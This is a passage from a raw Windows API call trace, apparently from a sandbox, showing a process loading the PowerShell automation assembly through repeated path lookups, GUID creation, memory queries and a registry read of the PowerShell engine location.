lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.675] GetLastError () returned 0x0 [0076.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.675] GetLastError () returned 0x0 [0076.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.675] GetLastError () returned 0x0 [0076.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.675] GetLastError () returned 0x0 [0076.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.675] GetLastError () returned 0x0 [0076.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.675] GetLastError () returned 0x0 [0076.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.676] GetLastError () returned 0x0 [0076.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.676] GetLastError () returned 0x0 [0076.676] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xdbd7cb1a, Data2=0xb154, Data3=0x4ad0, Data4=([0]=0xbf, [1]=0x6a, [2]=0x40, [3]=0x76, [4]=0xbd, [5]=0x14, [6]=0x51, [7]=0x24))) returned 0x0 [0076.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.676] GetLastError () returned 0x0 [0076.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.676] GetLastError () returned 0x0 [0076.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.676] GetLastError () returned 0x0 [0076.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.676] GetLastError () returned 0x0 [0076.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.676] GetLastError () returned 0x0 [0076.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.677] GetLastError () returned 0x0 [0076.677] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x3cbdbe32, Data2=0xadd6, Data3=0x4629, Data4=([0]=0xae, [1]=0x9e, [2]=0x3b, [3]=0xf, [4]=0x5c, [5]=0x70, [6]=0xf2, [7]=0xa8))) returned 0x0 [0076.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.677] GetLastError () returned 0x0 [0076.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.677] GetLastError () returned 0x0 [0076.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.677] GetLastError () returned 0x0 [0076.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.677] GetLastError () returned 0x0 [0076.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.677] GetLastError () returned 0x0 [0076.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.677] GetLastError () returned 0x0 [0076.678] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xec24d8ef, Data2=0x59f6, Data3=0x432e, Data4=([0]=0x90, [1]=0x4a, [2]=0x5d, [3]=0x7a, [4]=0x7d, [5]=0x63, [6]=0xef, [7]=0x98))) returned 0x0 [0076.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.678] GetLastError () returned 0x0 [0076.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.678] GetLastError () returned 0x0 [0076.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.678] GetLastError () returned 0x0 [0076.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.678] GetLastError () returned 0x0 [0076.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.678] GetLastError () returned 0x0 [0076.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.678] GetLastError () returned 0x0 [0076.679] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x532083f4, Data2=0x1f9, Data3=0x460d, Data4=([0]=0xb5, [1]=0xa7, [2]=0x5, [3]=0xde, [4]=0x11, [5]=0xab, [6]=0xb6, [7]=0xa1))) returned 0x0 [0076.679] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xd945dc5f, Data2=0x892a, Data3=0x4083, Data4=([0]=0xab, [1]=0x88, [2]=0xe5, [3]=0x43, [4]=0x78, [5]=0x39, [6]=0x13, [7]=0xea))) returned 0x0 [0076.679] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x5e5ec145, Data2=0x49b3, Data3=0x4763, Data4=([0]=0x83, [1]=0x7f, [2]=0x8a, [3]=0x7, [4]=0xcb, [5]=0xbb, [6]=0x4c, [7]=0x68))) returned 0x0 [0076.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.679] GetLastError () returned 0x0 [0076.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.679] GetLastError () returned 0x0 [0076.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.679] GetLastError () returned 0x0 [0076.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.679] GetLastError () returned 0x0 [0076.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.679] GetLastError () returned 0x0 [0076.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.680] GetLastError () returned 0x0 [0076.680] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x3c405b94, Data2=0x96d4, Data3=0x4f7e, Data4=([0]=0xb8, [1]=0x1e, [2]=0xd5, [3]=0x5c, [4]=0x53, [5]=0xc2, [6]=0x8, [7]=0xba))) returned 0x0 [0076.680] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.680] GetLastError () returned 0x0 [0076.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.680] GetLastError () returned 0x0 [0076.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.680] GetLastError () returned 0x0 [0076.681] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.681] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.681] GetLastError () returned 0x0 [0076.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.681] GetLastError () returned 0x0 [0076.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.681] GetLastError () returned 0x0 [0076.681] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.681] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.682] GetLastError () returned 0x0 [0076.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.682] GetLastError () returned 0x0 [0076.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.682] GetLastError () returned 0x0 [0076.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.682] GetLastError () returned 0x0 [0076.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.682] GetLastError () returned 0x0 [0076.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.682] GetLastError () returned 0x0 [0076.682] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.682] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.684] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xe863613b, Data2=0xcba0, Data3=0x48c0, Data4=([0]=0x9c, [1]=0x5, [2]=0x49, [3]=0xe7, [4]=0x7a, [5]=0x19, [6]=0x52, [7]=0xf2))) returned 0x0 [0076.687] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xdb611aa3, Data2=0x5c91, Data3=0x4f6e, Data4=([0]=0x9d, [1]=0x1, [2]=0x57, [3]=0x33, [4]=0x64, [5]=0x3f, [6]=0xc, [7]=0xe9))) returned 0x0 [0076.689] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x908c996f, Data2=0xc59b, Data3=0x4a8c, Data4=([0]=0x81, [1]=0xb8, [2]=0xb3, [3]=0xf0, [4]=0xb4, [5]=0x8f, [6]=0x17, [7]=0x9c))) returned 0x0 [0076.689] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xe293612b, Data2=0x10b9, Data3=0x4a90, Data4=([0]=0x96, [1]=0xeb, [2]=0x85, [3]=0xdb, [4]=0x8f, [5]=0xd6, [6]=0x45, [7]=0x29))) returned 0x0 [0076.689] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x7f5f5a11, Data2=0x2f8e, Data3=0x4274, Data4=([0]=0xab, [1]=0x7f, [2]=0x17, [3]=0xaa, [4]=0x16, [5]=0xfa, [6]=0x65, [7]=0xd4))) returned 0x0 [0076.690] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x2a105da9, Data2=0x2c9, Data3=0x413c, Data4=([0]=0x9d, [1]=0x93, [2]=0xb2, [3]=0x54, [4]=0x3d, [5]=0x16, [6]=0xc5, [7]=0x2e))) returned 0x0 [0076.690] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x3a9bb316, Data2=0x3ced, Data3=0x48b3, Data4=([0]=0x80, [1]=0xb6, [2]=0x95, [3]=0x52, [4]=0x72, [5]=0x53, [6]=0x14, [7]=0xbc))) returned 0x0 [0076.690] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x9d8514b0, Data2=0xadf2, Data3=0x45c0, Data4=([0]=0xb8, [1]=0xa4, [2]=0xec, [3]=0x6e, [4]=0xa9, [5]=0xbc, [6]=0xa0, [7]=0x64))) returned 0x0 [0076.690] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x2856cc1e, Data2=0x7155, Data3=0x46cd, Data4=([0]=0x96, [1]=0x23, [2]=0x58, [3]=0xc6, [4]=0x8, [5]=0x11, [6]=0x29, [7]=0xf2))) returned 0x0 [0076.691] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x9314ce00, Data2=0xbca7, Data3=0x42d3, Data4=([0]=0x8b, [1]=0x5f, [2]=0x7a, [3]=0x71, [4]=0xe0, [5]=0xde, [6]=0x0, [7]=0x4f))) returned 0x0 [0076.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x358) returned 0x0 [0076.699] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.699] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.699] RegCloseKey (hKey=0x358) returned 0x0 [0076.701] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xe1ec6c60, Data2=0x60ab, Data3=0x48ff, Data4=([0]=0x89, [1]=0xf, [2]=0xc, [3]=0xd0, [4]=0x1e, [5]=0xe2, [6]=0x61, [7]=0x23))) returned 0x0 [0076.701] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x97b0e50, Data2=0xaeae, Data3=0x424b, Data4=([0]=0x9c, [1]=0xc3, [2]=0xce, [3]=0x81, [4]=0xcb, [5]=0x92, [6]=0x61, [7]=0x2f))) returned 0x0 [0076.701] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xba5109af, Data2=0x70e0, Data3=0x4ad0, Data4=([0]=0xaf, [1]=0xcb, [2]=0xaa, [3]=0x51, [4]=0xbb, [5]=0x73, [6]=0x95, [7]=0x81))) returned 0x0 [0076.702] CoCreateGuid (in: 